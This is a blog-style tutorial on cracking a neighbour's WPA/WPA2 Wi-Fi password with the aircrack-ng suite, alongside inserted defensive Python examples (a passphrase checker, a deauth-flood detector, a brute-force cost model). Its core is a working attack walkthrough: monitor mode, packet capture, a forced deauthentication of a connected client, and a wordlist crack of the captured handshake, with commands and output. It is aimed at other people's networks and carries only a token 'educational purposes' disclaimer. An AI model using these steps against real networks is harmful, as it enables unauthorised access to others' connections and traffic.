Nowadays we often see a neighbour's Wi-Fi network, but when we try to connect it asks for a password. Those passwords are set up as WEP or WPA/WPA2 keys. Here is a trick to hack or crack the wireless/Wi-Fi password using aircrack-ng.
In my previous article I showed you how to crack Wi-Fi or wireless passwords using BackTrack.
Hacking wireless Wi-Fi passwords
The most common types of wireless security are Wired Equivalent Privacy (WEP) and Wi-Fi Protected Access (WPA). WEP was the original encryption standard for wireless, intended to make wireless networks as secure as a wired network. There are several open source utilities, such as aircrack-ng, weplab, wepcrack, or airsnort, that crackers can use to break in by examining packets and looking for patterns in the encryption. WEP comes in different key sizes; the common key lengths are currently 128- and 256-bit. Later WPA and WPA2 were introduced to overcome the problems of WEP. WPA was based on the security protocol 802.11i, replacing the 802.11 of WEP. Using long random passwords or passphrases makes WPA virtually uncrackable; however, if a small password of less than 14 characters is used, it can be cracked in less than one minute by aircrack-ng. Most people use passwords of less than 14 characters, so aircrack-ng can be used for hacking.
Securing Wireless Network
The first step in securing a wireless connection is simply using a long random password of at least 14 characters. If your Wi-Fi device supports WPA2, use it; many users don't know that their device supports several security encryption techniques. Check which security techniques your router supports on its configuration page. If you don't know how to edit your router's settings, just open your browser and type 192.168.1.1 in the address bar; this brings up your router's configuration, where you can select them.
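A small policy checker and generator for the advice above, written as an added example (it is not code from the original post or from the aircrack-ng project). The 14-character minimum and the 80-bit entropy floor are assumptions taken from the advice; the 8 to 63 printable-ASCII bound is the WPA/WPA2 passphrase limit defined in IEEE 802.11i. The entropy estimate is an upper bound that only makes sense for randomly generated passphrases, which is why the generator uses the OS random source (secrets) rather than random.random().

```python
import math
import secrets
import string

# Added example, not from the original post. MIN_LEN and the 80-bit floor are
# assumptions based on the advice above; 8-63 printable ASCII is the 802.11i
# passphrase range (the 64-hex-digit form is the raw 256-bit PSK).
MIN_LEN = 14
MIN_ENTROPY_BITS = 80
WPA_MIN_LEN, WPA_MAX_LEN = 8, 63
ALPHABET = string.ascii_letters + string.digits + string.punctuation  # 94 symbols


def estimate_entropy_bits(passphrase: str) -> float:
    """Upper-bound entropy: assumes every character was drawn uniformly from the
    union of the character classes present. A dictionary word scores far above
    its real guessability, so rank random passphrases with this, not human ones."""
    pool = 0
    if any(c.islower() for c in passphrase):
        pool += 26
    if any(c.isupper() for c in passphrase):
        pool += 26
    if any(c.isdigit() for c in passphrase):
        pool += 10
    if any(c in string.punctuation for c in passphrase):
        pool += len(string.punctuation)
    return len(passphrase) * math.log2(pool) if pool else 0.0


def check_passphrase(passphrase: str) -> list[str]:
    """Return the list of policy violations; an empty list means it passes."""
    problems = []
    if not WPA_MIN_LEN <= len(passphrase) <= WPA_MAX_LEN:
        problems.append(f"WPA2 passphrases must be {WPA_MIN_LEN}-{WPA_MAX_LEN} characters")
    if len(passphrase) < MIN_LEN:
        problems.append(f"shorter than {MIN_LEN} characters")
    if any(not 0x20 <= ord(c) <= 0x7E for c in passphrase):
        problems.append("contains characters outside printable ASCII")
    if passphrase.isalpha() and passphrase.islower():
        problems.append("a single lowercase word is what a wordlist attack tries first")
    if estimate_entropy_bits(passphrase) < MIN_ENTROPY_BITS:
        problems.append(f"estimated entropy below {MIN_ENTROPY_BITS} bits")
    return problems


def generate_passphrase(length: int = 20) -> str:
    """Random passphrase from the OS CSPRNG; paste it into the router page."""
    if not MIN_LEN <= length <= WPA_MAX_LEN:
        raise ValueError(f"length must be {MIN_LEN}-{WPA_MAX_LEN}")
    return "".join(secrets.choice(ALPHABET) for _ in range(length))


if __name__ == "__main__":
    for candidate in ("password", "Password1!", generate_passphrase(20)):
        verdict = check_passphrase(candidate) or ["ok"]
        print(f"{candidate!r}: {estimate_entropy_bits(candidate):.1f} bits, {'; '.join(verdict)}")
```

Run it and the first two candidates fail on length and entropy while the generated one passes; the 20-character default leaves margin over the 14-character minimum because the estimate drops if a short random string happens to miss a character class.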
Cracking Wireless Network
As we have read above, this is an easy task: we just have to put our network card into monitor mode so as to capture packets from the target network. This NIC mode is driver dependent, and the network can then be monitored using aircrack-ng, but only a small number of cards support this mode under Windows. You can instead boot a live CD of any Linux OS (commonly BackTrack) or install a Linux OS as a virtual machine. Check the list of compatible cards before you start.
Now download aircrack-ng for the Linux or Windows platform; search on Google and you can get it there. The aircrack-ng suite is a collection of command-line programs aimed at WEP and WPA-PSK key cracking. The ones we will be using are:
airmon-ng - script used for switching the wireless network card to monitor mode
airodump-ng - for WLAN monitoring and capturing network packets
aireplay-ng - used to generate additional traffic on the wireless network
aircrack-ng - used to recover the WEP key, or launch a dictionary attack on WPA-PSK using the captured data
Using aircrack-ng
First, put the card in monitor mode:
root@bt:~# airmon-ng
Interface Chipset Driver
wifi0 Atheros madwifi-ng
ath0 Atheros madwifi-ng VAP (parent: wifi0)
ath1 Atheros madwifi-ng VAP (parent: wifi0)
wlan0 Ralink 2573 USB rt73usb - [phy0]
root@bt:~# airmon-ng start wlan0
Interface Chipset Driver
wifi0 Atheros madwifi-ng
ath0 Atheros madwifi-ng VAP (parent: wifi0)
ath1 Atheros madwifi-ng VAP (parent: wifi0)
wlan0 Ralink 2573 USB rt73usb - [phy0]
(monitor mode enabled on mon0)
OK, we can now use interface mon0.
Let's find a wireless network that uses WPA2 / PSK:
root@bt:~# airodump-ng mon0
CH 6 ][ Elapsed: 4 s ][ 2009-02-21 12:57
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
00:19:5B:52:AD:F7 -33 5 0 0 10 54 WPA2 CCMP PSK TestNet
BSSID STATION PWR Rate Lost Packets Probe
00:19:5B:52:AD:F7 00:1C:BF:90:5B:A3 -29 0- 1 12 4 TestNet
Stop airodump-ng and run it again, writing all packets to disk:
airodump-ng mon0 --channel 10 --bssid 00:19:5B:52:AD:F7 -w /tmp/wpa2
At this point you have two options: either wait until a client connects and the 4-way handshake is complete, or deauthenticate an existing client and thus force it to reassociate. Time is money, so let's force the deauthentication. We need the BSSID of the AP (-a) and the MAC of a connected client (-c):
root@bt:~# aireplay-ng -0 1 -a 00:19:5B:52:AD:F7 -c 00:1C:BF:90:5B:A3 mon0
13:04:19 Waiting for beacon frame (BSSID: 00:19:5B:52:AD:F7) on channel 10
13:04:20 Sending 64 directed DeAuth. STMAC: [00:1C:BF:90:5B:A3] [67|66 ACKs]
As a result, airodump-ng should indicate "WPA handshake:" in the upper right corner:
CH 10 ][ Elapsed: 2 mins ][ 2009-02-21 13:04 ][ WPA handshake: 00:19:5B:52:AD:F7
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
00:19:5B:52:AD:F7 -33 100 1338 99 0 10 54 WPA2 CCMP PSK TestNet
BSSID STATION PWR Rate Lost Packets Probe
00:19:5B:52:AD:F7 00:1C:BF:90:5B:A3 -27 54-54 0 230
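From the network owner's side, the 64 directed deauth frames above are the loudest part of this procedure, and a wireless IDS catches them by rate alone. The following is an added example (not code from the original post or from aircrack-ng) of that check: a sliding-window counter over sensor records of management frames. The records are constructed; the BSSID and station addresses are the ones from the airodump-ng output above, the timestamps and the threshold of 10 frames in 2 seconds are assumptions.

```python
from collections import defaultdict, deque

# Added example, not from the original post. Threshold and window are assumptions;
# tune them against a baseline of normal roaming/disconnect traffic.
DEAUTH_THRESHOLD = 10    # deauth frames to one station within the window
WINDOW_SECONDS = 2.0

# Constructed sensor records: (timestamp_seconds, subtype, bssid, station).
# Addresses come from the airodump-ng listing above; the timing is invented.
AP = "00:19:5B:52:AD:F7"
VICTIM = "00:1C:BF:90:5B:A3"
OTHER = "00:11:22:33:44:55"    # hypothetical second client
SAMPLE_FRAMES = (
    [(1000.0, "beacon", AP, "ff:ff:ff:ff:ff:ff"),
     (1001.2, "auth", AP, OTHER),
     (1001.3, "assoc", AP, OTHER),
     (1030.0, "deauth", AP, OTHER)]                    # one deauth: a client leaving normally
    + [(1060.0 + i * 0.015, "deauth", AP, VICTIM) for i in range(64)]   # a forged burst
)


def detect_deauth_bursts(frames, threshold=DEAUTH_THRESHOLD, window=WINDOW_SECONDS):
    """Count deauth frames per (bssid, station) inside a sliding time window and
    return one alert (bssid, station, burst_start, count) per pair that crosses
    the threshold. Frames are processed in time order regardless of input order."""
    recent = defaultdict(deque)
    alerted = set()
    alerts = []
    for ts, subtype, bssid, station in sorted(frames):
        if subtype != "deauth":
            continue
        key = (bssid, station)
        q = recent[key]
        q.append(ts)
        while ts - q[0] > window:        # drop frames that fell out of the window
            q.popleft()
        if len(q) >= threshold and key not in alerted:
            alerted.add(key)
            alerts.append((bssid, station, q[0], len(q)))
    return alerts


if __name__ == "__main__":
    for bssid, station, start, count in detect_deauth_bursts(SAMPLE_FRAMES):
        print(f"deauth flood: AP {bssid} -> station {station}, "
              f"{count} frames from t={start:.3f}s")
```

The single deauth to the other client never trips the rule, while the burst aimed at the victim alerts as soon as the tenth frame arrives. A deauth frame carries no proof of origin without 802.11w (Protected Management Frames), so rate is the only signal a sensor has; enabling 802.11w on APs and clients that support it makes forged deauth frames be discarded outright.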
Stop airodump-ng and make sure the files were created properly:
root@bt:/# ls /tmp/wpa2* -al
-rw-r--r-- 1 root root 35189 2009-02-21 13:04 /tmp/wpa2-01.cap
-rw-r--r-- 1 root root 476 2009-02-21 13:04 /tmp/wpa2-01.csv
-rw-r--r-- 1 root root 590 2009-02-21 13:04 /tmp/wpa2-01.kismet.csv
From this point forward you do not need to be anywhere near the wireless network. All cracking happens offline, so you can stop airodump-ng and the other processes and even walk away from the AP. In fact, I would suggest walking away and finding yourself a cosy place where you can live, eat, sleep, etc.
Cracking a WPA2 PSK key is based on bruteforcing, and it can take a very, very long time.
There are two ways of bruteforcing: one that is relatively fast but does not guarantee success, and one that is very slow but guarantees that you will find the key at some point in time.
The first option is using a wordlist/dictionary file. A lot of these files can be found on the internet (e.g. www.theargon.com or on packetstorm (see the archives)), or they can be generated with tools such as John the Ripper. Once the wordlist is created, all you need to do is run aircrack-ng with the wordlist and feed it the .cap file that contains the WPA2 handshake.
So if your wordlist is called word.lst (under /tmp/wordlists), you can run:
aircrack-ng -w /tmp/wordlists/word.lst -b 00:19:5B:52:AD:F7 /tmp/wpa2*.cap
The success of cracking the WPA2 PSK key is directly linked to the strength of your password file. In other words, you may get lucky and get the key very fast, or you may not get the key at all.
The second method (pure bruteforcing) will succeed for sure, but it may take ages to complete. Keep in mind that a WPA2 key can be up to 64 characters, so in theory you would have to build every password combination with all possible character sets and feed them into aircrack.
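The reason the second method "takes ages" is measurable, and the numbers are what justify the 14-character advice earlier on this page. As an added example (not code from the original post or from aircrack-ng), the block below derives the WPA2 PSK the way IEEE 802.11i defines it, PBKDF2-HMAC-SHA1 over the SSID with 4096 iterations, times how many derivations one CPU core manages per second, and turns that into worst-case years to exhaust every passphrase of a given length over the 94 printable ASCII symbols. The candidate strings it derives are constructed and nothing is compared against a handshake; this is a cost model, not a cracker. The 802.11i test vector (passphrase "password", SSID "IEEE") confirms the derivation.

```python
import hashlib
import string
import time

# Added example, not from the original post. PBKDF2-HMAC-SHA1 with 4096
# iterations and a 32-byte output is the 802.11i passphrase-to-PSK mapping.
PBKDF2_ITERATIONS = 4096
PSK_LEN = 32
ALPHABET_SIZE = len(string.ascii_letters + string.digits + string.punctuation)  # 94
SECONDS_PER_YEAR = 365.25 * 24 * 3600


def wpa2_psk(passphrase: str, ssid: str) -> bytes:
    """The 256-bit PSK; its 64-hex-digit form is the 'up to 64 characters' key
    that a router accepts instead of the 8-63 character passphrase."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode("ascii"),
                               ssid.encode("utf-8"), PBKDF2_ITERATIONS, PSK_LEN)


def measure_guesses_per_second(ssid: str = "TestNet", seconds: float = 0.3) -> float:
    """Single-threaded derivations per second on this machine, using constructed
    candidate strings. Every guess costs 4096 HMAC-SHA1 calls, whoever makes it."""
    start = time.perf_counter()
    n = 0
    while time.perf_counter() - start < seconds:
        wpa2_psk(f"candidate{n:08d}", ssid)
        n += 1
    return n / (time.perf_counter() - start)


def seconds_to_exhaust(length: int, alphabet_size: int, guesses_per_second: float) -> float:
    """Worst-case time to try every passphrase of exactly `length` characters."""
    return alphabet_size ** length / guesses_per_second


def cost_table(guesses_per_second: float, lengths=(8, 10, 14, 20)) -> dict[int, float]:
    """Passphrase length -> years to exhaust the 94-symbol alphabet at that rate."""
    return {n: seconds_to_exhaust(n, ALPHABET_SIZE, guesses_per_second) / SECONDS_PER_YEAR
            for n in lengths}


if __name__ == "__main__":
    rate = measure_guesses_per_second()
    print(f"{rate:,.0f} PBKDF2 guesses/s on one core (GPU rigs do far more; the ratios hold)")
    for n, years in cost_table(rate).items():
        print(f"  {n:2d} random characters: {years:.3g} years")
```

Each extra random character multiplies the search by 94, so going from 8 to 14 characters costs the attacker a factor of roughly 6.9e11; a wordlist only beats this when the passphrase was never random in the first place, which is the gap the first method exploits.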
Hope you enjoy (-_-) this post!
Note: This tutorial is only for educational purposes.
Thanks to http://hackerzpositive.blogspot.in/